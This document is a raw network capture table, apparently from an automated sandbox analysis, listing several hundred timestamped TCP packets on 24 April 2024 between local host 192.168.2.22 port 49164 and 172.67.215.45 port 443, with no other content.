Apr 24, 2024 10:24:14.130837917 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.132356882 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.132381916 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.132414103 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.132421970 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.132441044 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.134239912 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.134263992 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.134303093 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.134311914 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.134334087 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.136091948 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.136122942 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.136157036 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.136163950 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.136184931 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.138111115 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.138134956 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.138178110 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.138185024 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.138202906 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.139921904 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.139972925 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.139990091 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.139997005 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.140027046 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.140969038 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.140991926 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.141022921 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.141031027 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.141048908 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.143043995 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.143063068 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.143104076 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.143110991 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.143228054 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.145427942 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.145452023 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.145486116 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.145493984 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.145505905 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.146641970 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.146663904 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.147028923 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.147038937 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.147047997 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.147737980 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.147762060 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.147814035 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.147823095 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.147842884 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.149512053 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.149533033 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.149579048 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.149585962 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.149606943 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.151313066 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.151338100 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.151426077 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.151433945 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.151459932 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.153063059 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.153084993 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.153141975 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.153151989 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.153162956 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.156661034 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.156687975 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.156800032 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.156800032 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.156825066 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.156982899 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.157010078 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.157035112 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.157044888 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.157058954 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.158797026 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.158818960 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.158850908 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.158859015 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.158871889 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.158894062 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.160937071 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.160959959 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.161003113 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.161010981 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.161022902 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.161684036 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.161710024 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.161742926 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.161748886 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.161761045 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.163538933 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.163574934 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.163599014 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.163606882 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.163621902 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.164608002 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.164633036 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.164661884 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.164669991 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.164681911 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.164777040 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.166691065 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.166713953 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.166753054 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.166759014 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.166776896 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.167279959 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.167341948 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.167378902 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.167397022 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.167402983 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.167432070 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.167432070 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.171725035 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.171751022 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.171842098 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.171842098 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.171849012 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.172579050 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.172601938 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.172636032 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.172643900 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.172656059 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.173475027 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.173521996 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.173531055 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.173537016 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.173577070 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.174777985 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.174828053 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.174834967 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.174841881 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.174875975 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.175474882 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.175498962 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.175535917 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.175544977 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.175555944 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.178437948 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.178462029 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.178519011 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.178527117 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.178554058 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.179799080 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.179821014 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.179866076 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.179872990 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.179892063 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.180680990 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.180707932 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.180743933 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.180752993 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.180779934 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.181174994 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.181195021 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.181227922 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.181235075 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.181252956 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.181297064 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.182377100 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.182406902 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.182435989 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.182440996 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.182452917 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.183317900 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.183341980 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.183382988 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.183388948 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.183410883 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.183878899 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.183897018 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.183938980 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.183944941 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.183967113 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.184715033 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.184736013 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.184777021 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.184781075 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.184803009 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.185828924 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.185847044 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.185893059 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.185898066 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.185920000 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.186745882 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.186777115 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.186820030 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.186825037 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.186852932 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.187494040 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.187511921 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.187557936 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.187557936 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.187565088 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.187576056 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.189949036 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.189970016 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.190011024 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.190015078 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.190042973 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.190609932 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.190627098 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.190704107 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.190704107 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.190711021 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.191304922 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.191324949 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.191368103 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.191371918 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.191395044 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.191806078 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.191823006 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.191868067 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.191873074 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.191895962 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.192255974 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.192277908 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.192317009 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.192321062 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.192342043 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.192862034 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.192879915 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.192924023 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.192929983 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.192939997 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.193320990 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.193342924 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.193382025 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.193386078 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.193403959 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.193839073 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.193856955 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.193897963 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.193905115 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.193922997 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.194293976 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.194314957 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.194355011 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.194360018 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.194381952 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.195979118 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.195996046 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.196053982 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.196053982 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.196060896 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.196162939 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.196455002 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.196472883 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.196520090 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.196525097 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.196533918 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.196826935 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.196849108 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.196886063 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.196891069 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.196908951 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.197244883 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.197263002 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.197305918 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.197310925 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.197320938 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.198177099 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.198196888 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.198240042 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.198246002 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.198256016 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.199117899 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.199136019 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.199172974 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.199181080 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.199198008 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.200110912 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.200134993 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.200167894 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.200175047 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.200191975 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.201107979 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.201128960 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.201164961 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.201175928 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.201189041 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.202011108 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.202034950 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.202071905 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.202078104 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.202091932 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.203639030 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.203660965 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.203700066 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.203705072 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.203722000 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.204124928 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.204149008 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.204183102 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.204189062 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.204210043 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.205146074 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.205166101 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.205214977 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.205219984 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.205238104 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.205967903 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.205992937 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.206027985 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.206032991 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.206074953 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.207638025 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.207658052 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.207698107 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.207703114 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.207724094 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.208586931 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.208611965 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.208769083 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.208769083 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.208775043 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.210083961 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.210104942 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.210151911 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.210158110 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.210180044 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.213851929 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.213885069 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.213923931 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.213928938 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.213947058 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.219497919 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.219516039 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.219593048 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.219598055 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.219607115 CEST	49164	443	192.168.2.22	172.67.215.45
